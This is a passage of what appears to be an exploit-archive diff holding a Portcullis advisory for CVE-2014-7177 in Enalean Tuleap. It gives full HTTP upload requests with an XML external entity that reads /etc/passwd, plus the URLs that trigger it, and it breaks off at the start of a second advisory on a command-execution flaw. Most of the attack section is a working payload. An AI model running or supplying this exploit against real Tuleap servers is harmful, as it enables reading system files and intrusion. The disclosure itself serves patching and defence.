<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
|
||||
</permissions>
|
||||
</tracker>
|
||||
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
123
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
123
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="itemname"
|
||||
|
||||
e123
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="Create"
|
||||
|
||||
Créer
|
||||
-----------------------------25777276834778--
|
||||
|
||||
|
||||
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?group_id=102&tracker=11
|
||||
|
||||
|
||||
3) Using retrieved tracker number, a XXE can be trigerred by visiting the following URL:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements
|
||||
|
||||
|
||||
Vulnerability 2
|
||||
|
||||
1) Upload a XXE using the following request:
|
||||
|
||||
<
|
||||
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
|
||||
Host: [ip]
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
|
||||
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
|
||||
Content-Length: 25588
|
||||
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="group_id"
|
||||
|
||||
102
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="func"
|
||||
|
||||
docreate
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="group_id_template"
|
||||
|
||||
100
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="tracker_new_prjname"
|
||||
|
||||
Commencez à taper
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="create_mode"
|
||||
|
||||
xml
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
|
||||
<tracker instantiate_for_new_projects="0">
|
||||
<name>Bugs</name>
|
||||
<item_name>bug</item_name>
|
||||
<description>Bugs Tracker</description>
|
||||
<cannedResponses/>
|
||||
<formElements>
|
||||
<formElement type="column" ID="F1" rank="120">
|
||||
<name>column8</name>
|
||||
<label>Column Top 1</label>
|
||||
<formElements>
|
||||
<formElement type="aid" ID="F2" rank="0">
|
||||
<name>artifact_id</name>
|
||||
<label>Artifact ID</label>
|
||||
<description>Unique artifact identifier&xxe;</description>
|
||||
</formElement>
|
||||
<formElement type="subby" ID="F3" rank="1">
|
||||
<name>submitted_by</name>
|
||||
<label>Submitted by</label>
|
||||
<description>User who originally submitted the artifact&xxe;</description>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F4" rank="121">
|
||||
<name>column10&xxe;</name>
|
||||
<label>Column Top 2&xxe;</label>
|
||||
<formElements>
|
||||
<formElement type="lud" ID="F5" rank="0">
|
||||
<name>last_update_date</name>
|
||||
<label>Last Modified On&xxe;</label>
|
||||
<description>Date and time of the latest modification in an artifact&xxe;</description>
|
||||
</formElement>
|
||||
<formElement type="subon" ID="F6" rank="2">
|
||||
<name>open_date&xxe;</name>
|
||||
<label>Submitted on&xxe;</label>
|
||||
<description>Date and time for the initial artifact submission&xxe;</description>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F7" rank="132" required="1">
|
||||
<name>fieldset_1</name>
|
||||
<label>Details</label>
|
||||
<description>fieldset_default_desc_key</description>
|
||||
<formElements>
|
||||
<formElement type="string" ID="F8" rank="0" required="1">
|
||||
<name>summary</name>
|
||||
<label>Summary</label>
|
||||
<description>One line description of the artifact</description>
|
||||
<properties maxchars="150" size="61"/>
|
||||
</formElement>
|
||||
<formElement type="text" ID="F9" rank="7">
|
||||
<name>details</name>
|
||||
<label>Original Submission</label>
|
||||
<description>A full description of the artifact</description>
|
||||
<properties rows="7" cols="80"/>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F10" rank="8">
|
||||
<name>column10</name>
|
||||
<label>Column Details 1</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F11" rank="0">
|
||||
<name>severity</name>
|
||||
<label>Severity</label>
|
||||
<description>Impact of the artifact on the system (Critical, Major,...)</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F11-V0" label="1 - Ordinary"/>
|
||||
<item ID="F11-V1" label="2"/>
|
||||
<item ID="F11-V2" label="3"/>
|
||||
<item ID="F11-V3" label="4"/>
|
||||
<item ID="F11-V4" label="5 - Major"/>
|
||||
<item ID="F11-V5" label="6"/>
|
||||
<item ID="F11-V6" label="7"/>
|
||||
<item ID="F11-V7" label="8"/>
|
||||
<item ID="F11-V8" label="9 - Critical"/>
|
||||
</items>
|
||||
<decorators>
|
||||
<decorator REF="F11-V0" r="255" g="255" b="102"/>
|
||||
<decorator REF="F11-V1" r="255" g="204" b="51"/>
|
||||
<decorator REF="F11-V2" r="255" g="153" b="0"/>
|
||||
<decorator REF="F11-V3" r="255" g="102" b="0"/>
|
||||
<decorator REF="F11-V4" r="255" g="51" b="0"/>
|
||||
<decorator REF="F11-V5" r="204" g="0" b="0"/>
|
||||
<decorator REF="F11-V6" r="153" g="0" b="0"/>
|
||||
<decorator REF="F11-V7" r="102" g="0" b="0"/>
|
||||
<decorator REF="F11-V8" r="51" g="0" b="0"/>
|
||||
</decorators>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F12" rank="12">
|
||||
<name>column10</name>
|
||||
<label>Column Details 2</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F13" rank="0">
|
||||
<name>category</name>
|
||||
<label>Category</label>
|
||||
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="date" ID="F14" rank="20" use_it="0">
|
||||
<name>close_date</name>
|
||||
<label>End Date</label>
|
||||
<description>End Date</description>
|
||||
<properties default_value="today"/>
|
||||
</formElement>
|
||||
<formElement type="msb" ID="F15" rank="31" use_it="0">
|
||||
<name>multi_assigned_to</name>
|
||||
<label>Assigned to (multiple)</label>
|
||||
<description>Who is in charge of this artifact</description>
|
||||
<properties size="7"/>
|
||||
<bind type="users">
|
||||
<items>
|
||||
<item label="group_members"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F17" rank="283">
|
||||
<name>fieldset1</name>
|
||||
<label>Stage</label>
|
||||
<formElements>
|
||||
<formElement type="column" ID="F18" rank="0">
|
||||
<name>column3</name>
|
||||
<label>Stage 1</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F19" rank="2">
|
||||
<name>status_id</name>
|
||||
<label>Status</label>
|
||||
<description>Artifact Status</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F19-V0" label="New"/>
|
||||
<item ID="F19-V1" label="Unconfirmed"/>
|
||||
<item ID="F19-V2" label="Verified"/>
|
||||
<item ID="F19-V3" label="Resolved"/>
|
||||
<item ID="F19-V4" label="Closed"/>
|
||||
<item ID="F19-V5" label="Reopened"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F20" rank="5" use_it="0">
|
||||
<name>stage</name>
|
||||
<label>Stage</label>
|
||||
<description>Stage in the life cycle of the artifact</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F20-V0" label="New">
|
||||
<description>The artifact has just been submitted</description>
|
||||
</item>
|
||||
<item ID="F20-V1" label="Analyzed">
|
||||
<description>The cause of the artifact has been identified and documented</description>
|
||||
</item>
|
||||
<item ID="F20-V2" label="Accepted">
|
||||
<description>The artifact will be worked on.</description>
|
||||
</item>
|
||||
<item ID="F20-V3" label="Under Implementation">
|
||||
<description>The artifact is being worked on.</description>
|
||||
</item>
|
||||
<item ID="F20-V4" label="Ready for Review">
|
||||
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
|
||||
</item>
|
||||
<item ID="F20-V5" label="Ready for Test">
|
||||
<description>Updated/Created software is ready to be included in the next build</description>
|
||||
</item>
|
||||
<item ID="F20-V6" label="In Test">
|
||||
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
|
||||
</item>
|
||||
<item ID="F20-V7" label="Approved">
|
||||
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
|
||||
</item>
|
||||
<item ID="F20-V8" label="Declined">
|
||||
<description>The artifact was not accepted.</description>
|
||||
</item>
|
||||
<item ID="F20-V9" label="Done">
|
||||
<description>The artifact is closed.</description>
|
||||
</item>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F21" rank="2">
|
||||
<name>column4</name>
|
||||
<label>Stage 2</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F22" rank="0">
|
||||
<name>resolution</name>
|
||||
<label>Resolution</label>
|
||||
<description>The resolution field indicates what happened to the bug.</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F22-V0" label="Fixed"/>
|
||||
<item ID="F22-V1" label="Will not fix"/>
|
||||
<item ID="F22-V2" label="Invalid"/>
|
||||
<item ID="F22-V3" label="Later"/>
|
||||
<item ID="F22-V4" label="Duplicate"/>
|
||||
<item ID="F22-V5" label="Remind"/>
|
||||
<item ID="F22-V6" label="Works for me"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="column" ID="F23" rank="3">
|
||||
<name>column9</name>
|
||||
<label>Stage 3</label>
|
||||
<formElements>
|
||||
<formElement type="sb" ID="F24" rank="0" notifications="1">
|
||||
<name>assigned_to</name>
|
||||
<label>Assigned to</label>
|
||||
<description>Who is in charge of solving the artifact</description>
|
||||
<bind type="users">
|
||||
<items>
|
||||
<item label="group_members"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F25" rank="284">
|
||||
<name>fieldset1</name>
|
||||
<label>Attachments</label>
|
||||
<formElements>
|
||||
<formElement type="file" ID="F26" rank="0">
|
||||
<name>attachment</name>
|
||||
<label>Attachments</label>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F27" rank="286">
|
||||
<name>fieldset1</name>
|
||||
<label>References</label>
|
||||
<formElements>
|
||||
<formElement type="cross" ID="F28" rank="0">
|
||||
<name>cross_references</name>
|
||||
<label>Cross references</label>
|
||||
<description>List of items referenced by or referencing this item.</description>
|
||||
</formElement>
|
||||
<formElement type="art_link" ID="F29" rank="1" use_it="0">
|
||||
<name>references</name>
|
||||
<label>References</label>
|
||||
<properties size="30"/>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="fieldset" ID="F30" rank="287">
|
||||
<name>fieldset1</name>
|
||||
<label>Permissions</label>
|
||||
<formElements>
|
||||
<formElement type="perm" ID="F31" rank="0">
|
||||
<name>permissions_on_artifact</name>
|
||||
<label>Permissions on artifact</label>
|
||||
<description>Let users groups to define who can access an artifact.</description>
|
||||
</formElement>
|
||||
</formElements>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F32" rank="26" use_it="0">
|
||||
<name>platform</name>
|
||||
<label>Platform</label>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F32-V0" label="Linux"/>
|
||||
<item ID="F32-V1" label="Windows XP"/>
|
||||
<item ID="F32-V2" label="Solaris"/>
|
||||
<item ID="F32-V3" label="Windows 2000"/>
|
||||
<item ID="F32-V4" label="Other"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F33" rank="28" use_it="0">
|
||||
<name>source</name>
|
||||
<label>Source</label>
|
||||
<description>Customer from which the request comes from.</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F34" rank="30" use_it="0">
|
||||
<name>version</name>
|
||||
<label>Version</label>
|
||||
<description>Product version concerned by the bug.</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
</formElements>
|
||||
<semantics>
|
||||
<semantic type="title">
|
||||
<shortname>title</shortname>
|
||||
<label>Titre</label>
|
||||
<description>Définir le titre d'un artéfact</description>
|
||||
<field REF="F8"/>
|
||||
</semantic>
|
||||
<semantic type="status">
|
||||
<shortname>status</shortname>
|
||||
<label>Ã?tat</label>
|
||||
<description>Définir l'état d'un artifact</description>
|
||||
<field REF="F19"/>
|
||||
<open_values>
|
||||
<open_value REF="F19-V0"/>
|
||||
<open_value REF="F19-V1"/>
|
||||
<open_value REF="F19-V2"/>
|
||||
<open_value REF="F19-V3"/>
|
||||
<open_value REF="F19-V5"/>
|
||||
</open_values>
|
||||
</semantic>
|
||||
<semantic type="contributor">
|
||||
<shortname>contributor</shortname>
|
||||
<label>Contributor/assignee</label>
|
||||
<description>Define the contributor/assignee of an artifact</description>
|
||||
<field REF="F24"/>
|
||||
</semantic>
|
||||
<semantic type="tooltip">
|
||||
<field REF="F2"/>
|
||||
<field REF="F8"/>
|
||||
<field REF="F19"/>
|
||||
</semantic>
|
||||
</semantics>
|
||||
<reports>
|
||||
<report is_default="0">
|
||||
<name>Bugs</name>
|
||||
<description>The system default artifact report</description>
|
||||
<criterias>
|
||||
<criteria rank="0">
|
||||
<field REF="F19"/>
|
||||
</criteria>
|
||||
<criteria rank="1">
|
||||
<field REF="F24"/>
|
||||
</criteria>
|
||||
<criteria rank="2">
|
||||
<field REF="F6"/>
|
||||
</criteria>
|
||||
<criteria rank="3">
|
||||
<field REF="F2"/>
|
||||
</criteria>
|
||||
<criteria rank="4">
|
||||
<field REF="F5"/>
|
||||
</criteria>
|
||||
<criteria rank="5">
|
||||
<field REF="F8"/>
|
||||
</criteria>
|
||||
<criteria rank="6">
|
||||
<field REF="F9"/>
|
||||
</criteria>
|
||||
<criteria rank="7">
|
||||
<field REF="F22"/>
|
||||
</criteria>
|
||||
<criteria rank="8">
|
||||
<field REF="F13"/>
|
||||
</criteria>
|
||||
</criterias>
|
||||
<renderers>
|
||||
<renderer type="table" rank="0" chunksz="15" multisort="15">
|
||||
<name>Results</name>
|
||||
<columns>
|
||||
<field REF="F2"/>
|
||||
<field REF="F8"/>
|
||||
<field REF="F6"/>
|
||||
<field REF="F24"/>
|
||||
<field REF="F3"/>
|
||||
</columns>
|
||||
</renderer>
|
||||
<renderer type="plugin_graphontrackersv5" rank="1">
|
||||
<name>Charts</name>
|
||||
<description>Graphic Report</description>
|
||||
<charts>
|
||||
<chart type="pie" width="600" height="400" rank="0" base="F19">
|
||||
<title>Status</title>
|
||||
<description>Number of Artifacts by Status</description>
|
||||
</chart>
|
||||
<chart type="bar" width="600" height="400" rank="1" base="F11">
|
||||
<title>Severity</title>
|
||||
<description>Number of Artifacts by severity level</description>
|
||||
</chart>
|
||||
<chart type="pie" width="600" height="400" rank="2" base="F24">
|
||||
<title>Assignment</title>
|
||||
<description>Number of Artifacts by Assignee</description>
|
||||
</chart>
|
||||
</charts>
|
||||
</renderer>
|
||||
</renderers>
|
||||
</report>
|
||||
<report is_default="0">
|
||||
<name>Default</name>
|
||||
<description>The system default artifact report</description>
|
||||
<criterias>
|
||||
<criteria rank="0">
|
||||
<field REF="F19"/>
|
||||
</criteria>
|
||||
<criteria rank="1">
|
||||
<field REF="F24"/>
|
||||
</criteria>
|
||||
<criteria rank="2">
|
||||
<field REF="F6"/>
|
||||
</criteria>
|
||||
<criteria rank="3">
|
||||
<field REF="F2"/>
|
||||
</criteria>
|
||||
<criteria rank="4">
|
||||
<field REF="F13"/>
|
||||
</criteria>
|
||||
</criterias>
|
||||
<renderers>
|
||||
<renderer type="table" rank="0" chunksz="15" multisort="15">
|
||||
<name>Results</name>
|
||||
<columns>
|
||||
<field REF="F2"/>
|
||||
<field REF="F8"/>
|
||||
<field REF="F6"/>
|
||||
<field REF="F24"/>
|
||||
<field REF="F3"/>
|
||||
</columns>
|
||||
</renderer>
|
||||
</renderers>
|
||||
</report>
|
||||
</reports>
|
||||
<workflow>
|
||||
<field_id REF="F19"/>
|
||||
<is_used>1</is_used>
|
||||
<transitions>
|
||||
<transition>
|
||||
<from_id REF="null"/>
|
||||
<to_id REF="F19-V0"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V1"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V2"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V1"/>
|
||||
<to_id REF="F19-V2"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V1"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V3"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V4"/>
|
||||
<to_id REF="F19-V5"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V5"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V5"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V0"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V1"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V2"/>
|
||||
<to_id REF="F19-V3"/>
|
||||
</transition>
|
||||
<transition>
|
||||
<from_id REF="F19-V2"/>
|
||||
<to_id REF="F19-V4"/>
|
||||
</transition>
|
||||
</transitions>
|
||||
</workflow>
|
||||
<permissions>
|
||||
<permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
|
||||
</permissions>
|
||||
</tracker>
|
||||
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="name"
|
||||
|
||||
Bugs
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
Bugs Tracker
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="itemname"
|
||||
|
||||
bug
|
||||
-----------------------------12077103611061
|
||||
Content-Disposition: form-data; name="Create"
|
||||
|
||||
Créer
|
||||
-----------------------------12077103611061--
|
||||
|
||||
|
||||
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?group_id=102&tracker=12
|
||||
|
||||
|
||||
3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:
|
||||
|
||||
|
||||
https://[ip]/plugins/tracker/?group_id=102&tracker=12
|
||||
|
||||
|
||||
Further details at:
|
||||
|
||||
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
41
platforms/php/webapps/35100.txt
Executable file
41
platforms/php/webapps/35100.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
|
||||
CVE: CVE-2014-7178
|
||||
Vendor: Enalean
|
||||
Product: Tuleap
|
||||
Affected version: 7.4.99.5 and earlier
|
||||
Fixed version: 7.5
|
||||
Reported by: Jerzy Kramarz
|
||||
|
||||
Details:
|
||||
|
||||
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
|
||||
|
||||
